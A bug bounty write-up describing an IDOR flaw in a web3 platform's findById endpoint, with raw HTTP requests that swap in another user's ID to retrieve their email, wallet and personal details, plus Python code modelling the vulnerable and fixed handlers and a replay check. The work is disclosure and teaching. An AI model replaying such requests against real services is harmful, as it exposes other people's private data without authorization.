Hi hunters, Rs is here with my latest finding on one well-known web3 bug bounty platform. I hope you find this helpful; if yes, you're welcome to share ideas and appreciation.
Small request: If you spot any spelling or grammatical errors, please ignore them…
Let's get started!
Broken Object Level Authorization (IDOR) in a findById endpoint exposing sensitive PII
Insecure Direct Object Reference (IDOR) is a common access control vulnerability in which an application exposes internal object identifiers (database keys, record IDs) and fails to verify that the authenticated user is authorized for the referenced object. By substituting these identifiers, an attacker may gain unauthorized access to other users' data or perform actions outside their intended privilege scope.
This write-up demonstrates an IDOR vulnerability that I found during my security testing on a web3 bug bounty platform. Here I explain the root cause and provide a proof of concept showing how missing authorization validation can lead to sensitive data exposure.

Steps to Reproduce:
- Create two accounts that you control: Account A: wegala1673@noidem.com and Account B: xpwxxx@gmail.com. Note each account's user ID (it appears in the findById request below).
- Log in as Account A, capture the request that fetches the account details, and send it to the Repeater tab in Burp Suite.
The request looks like:

GET /api/v1/client/user/findById/68b7ac4b17ecb8a068cc79a7 HTTP/2
Host: server.targetfinance.com
User-Agent: Mozilla/5.0

> Replace the account ID in the path with Account B's ID, keeping Account A's session (cookie/token) unchanged:

GET /api/v1/client/user/findById/68b7a7a117ecb8a068cc78b1 HTTP/2
Host: server.targetfinance.com
User-Agent: Mozilla/5.0

> Send the manipulated request and observe the response. The response contains Account B's sensitive details (name, email, crypto wallet address and many more personal details) even though the session belongs to Account A. It looks like this:

> After reporting, 6 days later I got a reply from triage:

And sadly this was a duplicate, and I got 5 reputation points. But I got lots of motivation to do more hunting.
Final Thoughts:
This IDOR issue highlights the importance of enforcing authorization checks on the server side for every request, regardless of client-side restrictions. The root cause here is that findById trusts the ID in the URL path and returns the record as long as the caller is authenticated; the server never checks that the requested object belongs to the caller. Applications should validate object ownership (or role-based access, for staff endpoints) on every object-level request. Unpredictable identifiers are defense in depth, not a substitute for that check: the 24-hex-character IDs here are not sequential, but once an attacker obtains another user's ID by any means, the endpoint hands over the record.
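As an added example (not code from the original post or from the affected platform), the following Python models the findById endpoint twice: once with the root cause described above, where the handler only checks that the caller is logged in, and once with a server-side ownership check. The idor_check function replays the reproduction steps from earlier in the write-up, sending the captured request with Account A's session and Account B's ID, and compares the returned record against the data the tester already knows for Account B. The session store, bearer tokens, names and wallet addresses are invented for this example; only the URL path and the two user IDs come from the write-up.

```python
import re
from dataclasses import dataclass, field
from typing import Callable, Dict, Optional, Tuple

# Constructed sample data for this example. The two user IDs are the ones shown
# in the write-up's requests; every other field (names, wallets, tokens) is
# invented and does not come from the real platform.
USERS: Dict[str, dict] = {
    "68b7ac4b17ecb8a068cc79a7": {"name": "Account A", "email": "wegala1673@noidem.com",
                                  "wallet": "0xaaaa0000000000000000000000000000000000aa"},
    "68b7a7a117ecb8a068cc78b1": {"name": "Account B", "email": "xpwxxx@gmail.com",
                                  "wallet": "0xbbbb0000000000000000000000000000000000bb"},
}
# Hypothetical session store: bearer token -> authenticated user ID.
SESSIONS: Dict[str, str] = {
    "token-A": "68b7ac4b17ecb8a068cc79a7",
    "token-B": "68b7a7a117ecb8a068cc78b1",
}

# The route from the write-up; the ID is a 24-hex-character string (ObjectId format).
ROUTE = re.compile(r"^GET /api/v1/client/user/findById/([0-9a-f]{24}) HTTP/")


@dataclass
class Response:
    status: int
    body: dict = field(default_factory=dict)


def authenticate(headers: Dict[str, str]) -> Optional[str]:
    """Resolve the caller's user ID from the Authorization header (None if not logged in)."""
    auth = headers.get("Authorization", "")
    if auth.startswith("Bearer "):
        return SESSIONS.get(auth[len("Bearer "):])
    return None


def find_by_id_vulnerable(request_line: str, headers: Dict[str, str]) -> Response:
    """Models the root cause: the handler checks authentication only, then takes
    the ID from the URL path and returns whatever record it points at."""
    if authenticate(headers) is None:
        return Response(401, {"error": "unauthenticated"})
    m = ROUTE.match(request_line)
    if not m or m.group(1) not in USERS:
        return Response(404, {"error": "not found"})
    return Response(200, USERS[m.group(1)])  # no ownership check: the IDOR


def find_by_id_fixed(request_line: str, headers: Dict[str, str]) -> Response:
    """Object-level authorization: the requested ID must be the caller's own ID."""
    caller = authenticate(headers)
    if caller is None:
        return Response(401, {"error": "unauthenticated"})
    m = ROUTE.match(request_line)
    # Compare against the authenticated identity, never against anything client-supplied.
    # Answer 404 for both "missing" and "not yours" so the endpoint does not confirm
    # which IDs exist (a 403 would turn findById into an ID-validity oracle).
    if not m or m.group(1) != caller or caller not in USERS:
        return Response(404, {"error": "not found"})
    return Response(200, USERS[caller])


Handler = Callable[[str, Dict[str, str]], Response]


def idor_check(handler: Handler, attacker_token: str, victim_id: str) -> Tuple[bool, Response]:
    """Replays the write-up's steps: send the captured findById request with the
    attacker's session but the victim's ID. Because the tester controls the
    victim account too, the returned record is compared with known data
    instead of being eyeballed in Burp."""
    headers = {"Host": "server.targetfinance.com",
               "User-Agent": "Mozilla/5.0",
               "Authorization": f"Bearer {attacker_token}"}
    resp = handler(f"GET /api/v1/client/user/findById/{victim_id} HTTP/2", headers)
    expected = USERS[victim_id]
    leaked = resp.status == 200 and resp.body.get("email") == expected["email"]
    return leaked, resp


if __name__ == "__main__":
    victim = "68b7a7a117ecb8a068cc78b1"  # Account B's ID from the write-up
    for name, handler in (("vulnerable", find_by_id_vulnerable), ("fixed", find_by_id_fixed)):
        leaked, resp = idor_check(handler, "token-A", victim)
        print(f"{name:10s} status={resp.status} leaked_B_PII={leaked}")
```

Run it and the vulnerable handler returns 200 with Account B's record to Account A's session, while the fixed handler returns 404 for the same request and 200 only when the path ID matches the authenticated user. Against a live target the same idor_check logic applies with the in-process handler replaced by a real HTTP call; the comparison with your own second account's known data is what makes the check reliable rather than a judgment call on a screenshot.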
I hope you like this real PoC in this era of AI-generated blogs.
Don't forget to follow me and leave a clap and your lovely comments. (You can do it many times!)
Next time, we'll meet with a more interesting topic.
Thanks for reading….
#bugbounty #IDOR #web3 #Bugbounty #Cybersecurity #EasyIDOR #PIILeak